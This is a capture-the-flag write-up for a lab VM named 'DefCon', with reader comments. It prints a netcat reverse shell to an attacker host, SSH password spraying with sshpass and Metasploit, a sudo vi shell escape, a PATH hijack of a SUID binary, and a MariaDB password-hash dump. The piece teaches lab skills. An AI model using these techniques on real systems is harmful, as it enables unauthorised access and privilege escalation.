DefCon

Introduction
After a first challenge, which can be found on tryhackme.com, this is my second challenge, dubbed “DefCon”.
The challenge walks through some basic skills and covers typical CTF-like skills.
I will post parts of the solution so people who get stuck for a while can move on, without spoiling everything.
[UPDATE]: next part added: from Nicky to Smith
Recon
First, find the open ports and running services:
```
PORT    STATE  SERVICE  VERSION
22/tcp  open   ssh?
80/tcp  open   http     Apache httpd 2.4.25
222/tcp closed rsh-spx
443/tcp open   ssl/http Apache httpd 2.4.25 ((Debian))
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port22-TCP:V=7.70%I=7%D=6/10%Time=5CFE6D96%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,8,"8\[Vuu2\r\n");
MAC Address: 00:0C:29:08:EA:C8 (VMware)
Service Info: Host: nsa-server
```
Web-server
When pointing the browser at 192.168.2.23 there is an error (Server not found) and the URL has changed.
The browser doesn't know where to go because there is no DNS. To solve this, add an entry to the /etc/hosts file.
```
192.168.2.23 nsa-server.net
```
Now the browser knows where to go.
Because the SSL certificate is self-signed there is a warning.
When accepting the risks the website is shown.
On this page there are 3 crypto puzzles.
Puzzle 1
```
dr0 cy berws sthre atapd phi shin g00ghac kergnka liikama lware erfhtim stnegar ans omwarefo drows sapeh tv iruss isiht
```
Puzzle 2
```
TTSFM34YHHWGGSRSIEOR0SEMSPRA0YV4IADHDO3RSSOANUR7
```
Puzzle 3
```
turret much eagle jazzers slow fish sleep sense red perv ending spider ice atlas flood zebra kilo phone
```
SSL
When checking the SSL certificate there is some information: an email address with a different domain name.
This indicates that several virtual hosts are probably active on the remote web server.
To browse the other domain name, adjust the /etc/hosts file again.
By changing the line to 192.168.2.23 nsa-server.net nsa-secretserver.net, the browser can be directed to the other domain.
The main page shows a terminal that reports the status of the system.
After waiting long enough it looks like something is wrong with the system, and at the end some code is being exfiltrated.
```
-/…./.\.--/---/.-./-../.--./.-././…/…\.--./.-/…/…/.--/---/.-./-..\---/..-.\.---/---/…./-.\../…\…/-/.----/.-../.-../…--/.-/…/-.--/-.-.--/-.-.--/-.-.--
```
The sequence is Morse code. The forward slash is functioning as letter delimiter and the backslash as word delimiter.
The website https://gchq.github.io/CyberChef/ can help with the deciphering.
```
TE WORDPRE PAWORD OF JON I T1LLAY!!!
```
There is a problem with the result: parts are missing.
Another look at the source code of the page with the Morse shows the cause: part of the Morse code is HTML-encoded. Every run of three dots has become the entity &#8230; (an ellipsis), which the decoder does not recognise.
To solve this a side step is needed.
```
root@redteam:~/DefCon/morse# echo "-/…./.\.--/---/.-./-../.--./.-././…/…\.--./.-/…/…/.--/---/.-./-..\---/..-.\.---/---/…./-.\../…\…/-/.----/.-../.-../…--/.-/…/-.--/-.-.--/-.-.--/-.-.--" > string.txt
root@redteam:~/DefCon/morse# sed -i 's/\&\#8230\;/.../g' string.txt
root@redteam:~/DefCon/morse# cat string.txt
-/..../.\.--/---/.-./-../.--./.-././.../...\.--./.-/.../.../.--/---/.-./-..\---/..-.\.---/---/..../-.\../...\.../-/.----/.-../.-../...--/.-/.../-.--/-.-.--/-.-.--/-.-.--
```
Decoding the corrected string in CyberChef gives a better result.
```
THE WORDPRESS PASSWORD OF JOHN IS [SPOILER]
```
WordPress – Graham
The WordPress dashboard has a Plugins menu. It contains a plugin called WPTerm, which offers a terminal on the system.
EoP1 – Graham > John
In the /home/graham folder there is some mail.
```
graham:/home/graham $ cat mbox
From john@nsa-server Mon Jun 10 11:35:48 2019
Return-path: <john@nsa-server>
Envelope-to: graham@nsa-server
Delivery-date: Mon, 10 Jun 2019 11:35:48 +0200
Received: from john by nsa-server with local (Exim 4.89)
        (envelope-from <john@nsa-server>)
        id 1haGiS-0004Sh-6R
        for graham@nsa-server; Mon, 10 Jun 2019 11:35:48 +0200
To: <graham@nsa-server>
Subject: password problems
X-Mailer: mail (GNU Mailutils 3.1.1)
Message-Id: <E1haGiS-0004Sh-6R@nsa-server>
From: john@nsa-server
Date: Mon, 10 Jun 2019 11:35:48 +0200

Hi Graham,

Sorry man to bother you, but I forgot my password.
I don't want to go to Smith because he will rip me a new hole.
Can you please help me?

Thanks man!!!

John
```
In the Trash folder there is a deleted note.
```
graham:/home/graham/.local/share/Trash/files $ cat note.txt
Hi John,

After your latest password failure I changed it.
You know where it is right? Wink Wink!
Pretty easy right?
Try not to forget this one also.
You know how the boss is like!
You wanna get fired or something?

Also smart idea to sent this message with netcat right?
I don't trust our mailsystem.
After sending this message, I'll trow it away....no one will know.
hahahaha......now who is a cybernoob!!!!

Best,
Graham

P.S. You Do kNow whEre The paSswoRd Is hiDden rigHt?
```
The new password of john is hidden in plain sight inside this message.
The last line has some uppercase letters; separating them from the rest of the string gives the password.
```
root@redteam:~/DefCon/john# echo "You Do kNow whEre The paSswoRd Is hiDden rigHt?" > pass.enc
root@redteam:~/DefCon/john# cat pass.enc | sed 's/[a-z]//g' | sed 's/ //g' | sed 's/\?//g' > pass.dec
root@redteam:~/DefCon/john# cat pass.dec
[SPOILER]
```
With the username and password, the next step would be to su to john.
```
graham:/home/graham/.local/share/Trash/files $ su john
su: must be run from a terminal
```
That is not going to work. Normally this would be a good time to SSH to the system as john,
but the SSH service on port 22 is a honeypot, so that would be a waste of time.
Instead, a reverse shell is the better way to get a proper TTY.
First start a listener on your machine with netcat:
```
root@kali:~# nc -lvnp 1337
listening on [any] 1337 ...
```
Then connect from the remote machine to your machine with netcat.
```
graham:/home/graham/.local/share/Trash/files $ nc 10.10.10.128 1337 -e /bin/sh
```
Now the connection is established and there is a reverse shell running.
```
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.129] 43696
id
uid=1002(graham) gid=1002(graham) groups=1002(graham),8(mail)
```
Now to get a proper TTY.
```
python -c 'import pty;pty.spawn("/bin/bash");'
graham@nsa-server:/home/graham/.local/share/Trash/files$
```
After this, switch to user john.
```
graham@nsa-server:/home/graham/.local/share/Trash/files$ su john
Password:
john@nsa-server:/home/graham/.local/share/Trash/files$ id
uid=1003(john) gid=1003(john) groups=1003(john),8(mail)
```
EoP 2 – John > George
First see what this user can do.
```
john@nsa-server:~$ sudo -l
sudo -l
[sudo] password for john: YDNETSRIDH
Matching Defaults entries for john on nsa-server:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User john may run the following commands on nsa-server:
    (ALL) PASSWD: /bin/systemctl start ssh, /bin/systemctl stop ssh,
        /bin/systemctl status ssh
```
It looks like user john can start a proper SSH server.
```
john@nsa-server:~$ sudo /bin/systemctl start ssh
```
But port 22 was already taken by the honeypot, so let's check which port the SSH server is using.
```
john@nsa-server:~$ ss -tan
ss -tan
State   Recv-Q  Send-Q  Local Address:Port                       Peer Address:Port
LISTEN  0       80      127.0.0.1:3306                           *:*
LISTEN  0       128     *:80                                     *:*
LISTEN  0       5       10.14.185.1:53                           *:*
LISTEN  0       128     *:22                                     *:*
LISTEN  0       20      127.0.0.1:25                             *:*
LISTEN  0       128     *:443                                    *:*
LISTEN  0       128     *:222                                    *:*
ESTAB   0       0       192.168.20.130:443                       192.168.20.131:44098
ESTAB   0       91      192.168.20.130:50678                     192.168.20.131:9999
LISTEN  0       5       fe80::cc1a:73ff:fe37:ea85%lxdbr0:53      :::*
LISTEN  0       2       ::1:3350                                 :::*
LISTEN  0       20      ::1:25                                   :::*
LISTEN  0       2       :::3389                                  :::*
LISTEN  0       128     :::222                                   :::*
```
It looks like port 222 is listening for a connection.
```
n0w4n@lab:~/DefCon$ ssh john@nsa-server.net -p 222
The authenticity of host '[nsa-server.net]:222 ([192.168.20.130]:222)' can't be established.
ECDSA key fingerprint is SHA256:sRxKXwYbv1ua3s7dbnPyX0hmggOGZ6IX3eDflEQ66Bo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[nsa-server.net]:222,[192.168.20.130]:222' (ECDSA) to the list of known hosts.
john@nsa-server.net's password:
Linux nsa-server 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Fri Apr 10 14:03:51 2020 from 10.10.10.130
john@nsa-server:~$
```
There is a file in the Documents folder.
```
john@nsa-server:~/Documents$ ls -lah
ls -lah
total 20K
drwxr-x---  2 john john 4.0K Apr 10 14:42 .
drwxr-x--- 16 john john 4.0K Apr 22 10:23 ..
-rw-r--r--  1 john john  11K Apr 10 14:42 secret.png
```
```
john@nsa-server:~/Documents$ file secret.png
file secret.png
secret.png: PDF document, version \012.\012
```
Judging by the extension it looks like a picture,
but when checking the file type, Linux says it is a PDF.
To get a better view of the file, transfer it to the local machine.
```
n0w4n@lab:~/DefCon$ scp -P 222 john@nsa-server.net:/home/john/Documents/secret.png .
john@nsa-server.net's password:
secret.png
```
When trying to open the file as a picture, there is nothing to show.
Copying the file and renaming it to .pdf also gives nothing.
When looking at the file in a hex editor, the important part to check is the header.
There are several lists of file signatures (magic bytes) online.
The hex signature listed for PDF matches the start of our file, but the file wasn't named .pdf; it was .png.
The first 5 bytes are those of a PDF header (%PDF-).
Looking a bit further, the 6th, 7th and 8th bytes look like the tail of the PNG signature.
So the PNG signature was partly overwritten with a PDF one. Overwrite the header to match the PNG file signature again.
In the ASCII column of the hex editor the header now reads as the PNG one.
```
n0w4n@lab:~/DefCon$ file secret.png
secret.png: PNG image data, 886 x 669, 8-bit/color RGB, non-interlaced
```
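As an added example (not part of the original post), the header check and repair from this section in Python: classify a file by its magic bytes rather than its extension, and only restore the PNG signature when the rest of the PNG structure (the IHDR chunk and its CRC) confirms the guess. The input PNG is constructed in the script and then damaged the way secret.png was, with its first five bytes replaced by the PDF magic.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"   # 89 50 4E 47 0D 0A 1A 0A
PDF_SIG = b"%PDF-"               # 25 50 44 46 2D


def build_png(width: int, height: int, rgb=(0, 0, 0)) -> bytes:
    """Construct a small but valid 8-bit RGB PNG (sample input, not the challenge file)."""
    def chunk(ctype: bytes, data: bytes) -> bytes:
        crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
        return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)  # depth 8, colour type 2 (RGB)
    scanline = b"\x00" + bytes(rgb) * width                        # filter type 0 per row
    idat = zlib.compress(scanline * height)
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")


def identify(data: bytes) -> str:
    """Classify by magic bytes instead of extension.
    'pdf-over-png' is the state secret.png was in: PDF magic in bytes 0-4, but the
    tail of the PNG signature in bytes 5-7 and an IHDR chunk at offset 12."""
    if data.startswith(PNG_SIG):
        return "png"
    if data.startswith(PDF_SIG):
        if data[5:8] == PNG_SIG[5:8] and data[12:16] == b"IHDR":
            return "pdf-over-png"
        return "pdf"
    return "unknown"


def repair_png(data: bytes) -> bytes:
    """Put the 8-byte PNG signature back, then verify the IHDR CRC so a wrong guess
    about the file type fails loudly instead of producing garbage."""
    if identify(data) != "pdf-over-png":
        raise ValueError("not a PNG with an overwritten signature")
    fixed = PNG_SIG + data[8:]
    length = struct.unpack(">I", fixed[8:12])[0]
    body = fixed[12:16 + length]                       # chunk type + chunk data
    stored = struct.unpack(">I", fixed[16 + length:20 + length])[0]
    if zlib.crc32(body) & 0xFFFFFFFF != stored:
        raise ValueError("IHDR CRC mismatch: file is not a PNG after all")
    return fixed


def png_dimensions(data: bytes) -> tuple:
    """Width and height from IHDR (what `file` prints once the signature is right)."""
    return struct.unpack(">II", data[16:24])


# Constructed sample: a valid 886x669 PNG (the size `file` reported for secret.png)
# with its first five bytes overwritten by the PDF magic, as found on the box.
GOOD = build_png(886, 669)
TAMPERED = PDF_SIG + GOOD[5:]

if __name__ == "__main__":
    print(identify(TAMPERED))                    # pdf-over-png
    print(png_dimensions(repair_png(TAMPERED)))  # (886, 669)
```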
The file is now readable as a picture and when opening it, there is a string.
A password maybe? But for who?
```
n0w4n@lab:~/DefCon$ cat names.list
george
graham
nicky
samantha
smith
```
There are several ways to find out which of these names the found password belongs to.
This writeup tries the following three.
First: because the list of names is small, it can be done by hand or with a small bash one-liner.
```
n0w4n@lab:~/DefCon$ for i in $(cat names.list); do ssh -l "${i}" nsa-server.net -p 222; done
george@nsa-server.net's password:
Linux nsa-server 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Apr 10 14:45:30 2020 from 10.10.10.130
george@nsa-server:~$
```
Pretty simple, but with a very long list of names it becomes an annoying task.
The second option is to use a tool called sshpass.
```
n0w4n@lab:~/DefCon$ for i in $(cat names.list); do sshpass -p "2W3dsF5tGh-Kl#1" ssh -o StrictHostKeyChecking=no "${i}"@nsa-server.net -p 222; done
Linux nsa-server 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Apr 22 13:40:32 2020 from 192.168.20.131
george@nsa-server:~$
```
This option was quite a bit faster and didn't need any manual input for the password.
The final option is to use Metasploit:
```
msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           false            yes       Whether to print output for all attempts

msf5 auxiliary(scanner/ssh/ssh_login) > set PASSWORD 2W3dsF5tGh-Kl#1
PASSWORD => 2W3dsF5tGh-Kl#1
msf5 auxiliary(scanner/ssh/ssh_login) > set USER_FILE names.list
USER_FILE => names.list
msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS nsa-server.net
RHOSTS => nsa-server.net
msf5 auxiliary(scanner/ssh/ssh_login) > set VERBOSE true
VERBOSE => true
msf5 auxiliary(scanner/ssh/ssh_login) > set RPORT 222
RPORT => 222
msf5 auxiliary(scanner/ssh/ssh_login) > run

[+] 192.168.20.130:222 - Success: 'george:2W3dsF5tGh-Kl#1' ''
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.20.131:38663 -> 192.168.20.130:222) at 2020-04-22 13:53:41 +0200
[-] 192.168.20.130:222 - Failed: 'graham:2W3dsF5tGh-Kl#1'
[-] 192.168.20.130:222 - Failed: 'nicky:2W3dsF5tGh-Kl#1'
[-] 192.168.20.130:222 - Failed: 'samantha:2W3dsF5tGh-Kl#1'
[-] 192.168.20.130:222 - Failed: 'smith:2W3dsF5tGh-Kl#1'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
This option also works fast when you have a very long list of usernames.
It is also fast when you have a list of passwords that needs to be tried against those usernames.
EoP 3 – George > Samantha
The recon starts over when logging in as a different user.
In this case user george also has some sudo rights on this system.
```
george@nsa-server:~$ sudo -l
[sudo] password for george:
Matching Defaults entries for george on nsa-server:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User george may run the following commands on nsa-server:
    (samantha) /usr/bin/vi
```
This user can run the Vi editor with the rights of user samantha.
This can be abused, but Vi has to be run as user samantha for that.
```
george@nsa-server:~$ sudo -u samantha vi test
```
Inside Vi editor there is an option to run a command:
```
$ id
uid=1006(samantha) gid=1006(samantha) groups=1006(samantha)
```
Use Python again to get a proper TTY.
```
$ python -c 'import pty;pty.spawn("/bin/bash");'
samantha@nsa-server:/home/george$
```
EoP 4 – Samantha > Nicky
Back in the home folder of this user, there is something of interest.
```
samantha@nsa-server:~$ ls -lah
total 72K
drwxr-x--- 10 samantha samantha 4.0K Apr 10 19:49 .
drwxr-xr-x  8 root     root     4.0K Apr 10 14:40 ..
-rw-------  1 samantha samantha    1 Apr 11 17:55 .bash_history
-rw-r--r--  1 samantha samantha  220 May 15  2017 .bash_logout
-rw-r--r--  1 samantha samantha 3.5K May 15  2017 .bashrc
-rwsr-xr-x  1 root     root     8.6K Apr 10 16:17 check
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Desktop
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Documents
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Downloads
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Music
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Pictures
-rw-r--r--  1 samantha samantha  675 May 15  2017 .profile
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Public
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Templates
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Videos
-rw-------  1 samantha samantha 2.1K Apr 10 19:49 .viminfo
```
There is an executable named check, owned by root, with the SUID bit set.
Let's see what the program does.
```
samantha@nsa-server:~$ ./check
[-] These are all the connections at the moment:

Netid  State   Recv-Q  Send-Q  Local Address:Port                      Peer Address:Port
udp    UNCONN  0       0       *:1900                                  *:*
udp    UNCONN  0       0       10.14.185.1:53                          *:*
udp    UNCONN  0       0       *:58430                                 *:*
udp    UNCONN  0       0       *%lxdbr0:67                             *:*
udp    UNCONN  0       0       *:5353                                  *:*
udp    UNCONN  0       0       fe80::cc1a:73ff:fe37:ea85%lxdbr0:53     :::*
udp    UNCONN  0       0       :::58540                                :::*
udp    UNCONN  0       0       :::5353                                 :::*
tcp    LISTEN  0       80      127.0.0.1:3306                          *:*
tcp    LISTEN  0       128     *:80                                    *:*
tcp    LISTEN  0       5       10.14.185.1:53                          *:*
tcp    LISTEN  0       128     *:22                                    *:*
tcp    LISTEN  0       20      127.0.0.1:25                            *:*
tcp    LISTEN  0       128     *:443                                   *:*
tcp    LISTEN  0       128     *:222                                   *:*
tcp    ESTAB   0       0       192.168.20.130:222                      192.168.20.131:48834
tcp    LISTEN  0       5       fe80::cc1a:73ff:fe37:ea85%lxdbr0:53     :::*
tcp    LISTEN  0       2       ::1:3350                                :::*
tcp    LISTEN  0       20      ::1:25                                  :::*
tcp    LISTEN  0       2       :::3389                                 :::*
tcp    LISTEN  0       128     :::222                                  :::*
```
It runs the ss command and shows a list of the current connections.
If the program uses a relative path to execute that command, we can manipulate PATH and fool the program into running something in our favor.
To do this, first create our own version of ss.
```
samantha@nsa-server:~$ echo "/bin/bash" > /tmp/ss
```
Then we make the file executable.
```
samantha@nsa-server:~$ chmod +x /tmp/ss
```
Because we want the program to execute our ss file instead of the real one, we alter the PATH variable.
```
samantha@nsa-server:~$ export PATH=/tmp:$PATH
```
This way, whenever the system looks for a program, it walks through the directories in the PATH variable in order.
Normally it starts in /usr/local/bin, then goes to /usr/bin, and keeps going until it finds the program.
If it doesn't find it, you get an error that the program can't be found.
When executing the check program, the system walks through PATH as usual, but now it starts in /tmp.
There it finds our ss executable, takes it for the real one and runs it.
```
samantha@nsa-server:~$ ./check
[-] These are all the connections at the moment:

nicky@nsa-server:~$ id
uid=1007(nicky) gid=1007(nicky) groups=1007(nicky),1006(samantha)
```
Running the program executed our version of ss and elevated our rights to... nicky (not root, bummer).
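As an added example (not from the original post) of the lookup described above, this Python script reproduces the PATH walk inside a temporary directory, and beside it the rule a SUID program should follow instead: search only a fixed list (the secure_path from the sudo -l output earlier in this writeup) and refuse any directory that is writable by group or others. The bin and tmp directories and the fake ss are constructed for the demonstration; nothing outside the temporary directory is touched.

```python
import os
import stat
import tempfile

# sudo's secure_path as shown by `sudo -l` on the box: the list a privileged
# program should search instead of whatever PATH its caller hands it.
SECURE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"


def resolve(cmd: str, path_env: str):
    """The shell's rule: the first directory in PATH order holding an executable `cmd` wins."""
    for directory in path_env.split(os.pathsep):
        candidate = os.path.join(directory, cmd)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def resolve_trusted(cmd: str, trusted: str = SECURE_PATH):
    """What a SUID helper should do: ignore the caller's PATH, search a fixed list,
    and refuse any hit whose directory is writable by group or others."""
    for directory in trusted.split(os.pathsep):
        candidate = os.path.join(directory, cmd)
        if not (os.path.isfile(candidate) and os.access(candidate, os.X_OK)):
            continue
        mode = os.stat(directory).st_mode
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            raise PermissionError(f"{directory} is writable by others; refusing {candidate}")
        return candidate
    return None


def build_sandbox():
    """Constructed layout: a 0755 'bin' with a real-looking ss and a 1777 'tmp' with a
    fake one, mirroring /bin and /tmp on the box without touching either."""
    root = tempfile.mkdtemp(prefix="pathdemo-")
    layout = {"bin": (0o755, "#!/bin/sh\necho real-ss\n"),
              "tmp": (0o1777, "#!/bin/sh\necho fake-ss\n")}
    dirs = {}
    for name, (mode, script) in layout.items():
        directory = os.path.join(root, name)
        os.mkdir(directory)
        with open(os.path.join(directory, "ss"), "w") as fh:
            fh.write(script)
        os.chmod(os.path.join(directory, "ss"), 0o755)
        os.chmod(directory, mode)   # set after writing, so the umask cannot interfere
        dirs[name] = directory
    return dirs["bin"], dirs["tmp"]


def demo() -> dict:
    """Run the four lookups that matter and report whether each picked the expected file."""
    bin_dir, tmp_dir = build_sandbox()
    real, fake = os.path.join(bin_dir, "ss"), os.path.join(tmp_dir, "ss")
    result = {
        "normal_path": resolve("ss", f"{bin_dir}:{tmp_dir}") == real,
        # export PATH=/tmp:$PATH from the writeup: the fake now comes first
        "hijacked_path": resolve("ss", f"{tmp_dir}:{bin_dir}") == fake,
        "trusted_list": resolve_trusted("ss", trusted=bin_dir) == real,
    }
    try:
        resolve_trusted("ss", trusted=f"{tmp_dir}:{bin_dir}")
        result["refused_writable_dir"] = False
    except PermissionError:
        result["refused_writable_dir"] = True
    return result


if __name__ == "__main__":
    print(demo())  # every value True
```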
EoP 5 – Nicky > Smith
When looking at the connections earlier, there was another one of interest:
a MariaDB instance running locally.
As it seems, user nicky has access to it.
To log in to MariaDB you need a password.
Lucky for you, user nicky stores hers in a hidden file.
```
nicky@nsa-server:~/Documents$ ls -lah
total 12K
drwxr-xr-x  2 nicky nicky 4.0K Apr 22 14:54 .
drwxr-x--- 10 nicky nicky 4.0K Apr 10 17:01 ..
-rw-r--r--  1 nicky nicky   14 Apr 22 14:54 .passwd
```
```
nicky@nsa-server:~/Documents$ cat .passwd
We_iuh#-qaSW1
```
The network connections showed a MySQL server (port 3306) listening on localhost only, so log in from the box itself.
```
nicky@nsa-server:/home/nicky/Documents$ mysql -u nicky -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 22
Server version: 10.1.38-MariaDB-0+deb9u1 Debian 9.8

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>
```
List all databases.
```
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
+--------------------+
4 rows in set (0.02 sec)
```
Select the database to use.
```
MariaDB [wordpress]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
```
Show all tables.
```
MariaDB [mysql]> show tables;
+---------------------------+
| Tables_in_mysql           |
+---------------------------+
| column_stats              |
| columns_priv              |
| db                        |
| event                     |
| func                      |
| general_log               |
| gtid_slave_pos            |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| index_stats               |
| innodb_index_stats        |
| innodb_table_stats        |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| roles_mapping             |
| servers                   |
| slow_log                  |
| table_stats               |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| user                      |
+---------------------------+
30 rows in set (0.00 sec)
```
Select the desired columns to show.
```
MariaDB [mysql]> select user,password from user;
+---------+-------------------------------------------+
| user    | password                                  |
+---------+-------------------------------------------+
| root    |                                           |
| admin   | *6B6D111D0EC8D42C2955E082DD087C3E56B17F98 |
| wpadmin | *5EF818CD1907F11532AD4EB544573261C73F7F2E |
| smith   | *BE84A0E22A8E3E1EAA0883956B3F8692DFE4CA13 |
| nicky   | *75961C95665DC2BAC3F947AF4C60FD73564BCFE2 |
+---------+-------------------------------------------+
5 rows in set (0.00 sec)

MariaDB [mysql]>
```
Crack the hashes with hashcat, or run a Google search for a site that lists known hashes.
One of them is a known hash: the password hash of user smith.
Now exit mysql and switch to user smith.
```
MariaDB [mysql]> exit;
Bye
nicky@nsa-server:/home/nicky/Documents$ su smith
Password:
smith@nsa-server:/home/nicky/Documents$ id
uid=1001(smith) gid=1001(smith) groups=1001(smith),8(mail),999(lxd)
```
And that’s it for this part.
Good luck…
hi bro, why did I add nsa-server.net nsa-secretserver.net resolution under hosts, or redirect to nsa-server.net.
in hosts:
192.168.123.19 nsa-server.net nsa-secretserver.net
The /etc/hosts file is used by your system to look up hosts when connecting to them through a domain name instead of an IP address.
When your system wants to connect to another system by domain name and it doesn't know the IP address, it uses the name servers that are available in its configuration (DNS).
But before it asks the name servers, it checks the hosts file first.
Hi!
Any clues to escalate privileges to the “smith” user? Thank you in advance
Not really…..any clue will give away the answer.
Hi,
I’d like to get a tiny nudge / push in the right direction for user “Smith”. Spend already more than a day on this user but nothing. None of the common tools or manual enumeration helped me.
Thanks!
do you have access to user smith already or do you try to get access to user smith?
We are the same, we try to access the user “smith”.
Which users do you already have compromised and from which user do you try to jump to user smith?
All users, I’m trying to jump from “Nicky” to “Smith”.
I have done: John > George > Samantha > Nicky
I need user Smith and Root.
In this phase…..a basic recon is required.
You need to know what is happening on this machine and who has access to what.
When you figure that out, the solution is in front of you.
The only thing I found is:
Both John and Smith are members of the group ‘mail’. I read a comment between John and Graham about Smith possibly reading their email. So maybe send some malicious email from John to Smith?
I have already tried something like that but until now haven't managed to get that to work, and I am not sure if Smith is reading his mail every now and then?!
P.s.: If this message is too much spoiler then please reply by email to me please !
You’ve got mail 🙂
Thanks for the email. Did you also get my reply to it (I saw that you used a temporary email address)?!
I suspect your hint was about Smith -> Root (that will go via [SPOILER]?!), but I first have to become Smith via one of the other users (Nicky, Samantha, John or Graham) and I would like a hint about that 🙂
You’ve got mail 🙂
I have the same question, I’m with user “Nicky” and I’m looking for a way to pass to user “Smith”, could you give me some hint? (Do it by mail to avoid the spoiler). Thanks in advance.
With a basic recon, you will find something on the system that user nicky has access to.
To get access you need a piece of information you probably don't have yet, because of the way you escalated to this user.
Once you find those 2 things, the way to user smith will become clear.
I didn't receive an email on the 20th! Can you forward it again please?
Check my reply to David (21-6-2020)
got nicky, towards smith now
why is user smith that hard to escalate to?
I've been turning every stone in this machine and apparently I must have missed something…
connecting with v.. to that desktop didn't reveal anything that I haven't seen from the terminal session.
I'm really stuck and would appreciate a small nudge to proceed
Escalating to user smith isn't that hard (I know it's easy for me to say); the path to take is relatively easy when you have all the information.
Look for files, then look for a service (you really need the file, or you get no access to this service), enumerate your findings and escalate to user smith.
I just added escalating from Samantha to Nicky and I'll be posting getting to smith next week.
Thanks for a really nice challenge. It was hard but very cool
glad you liked it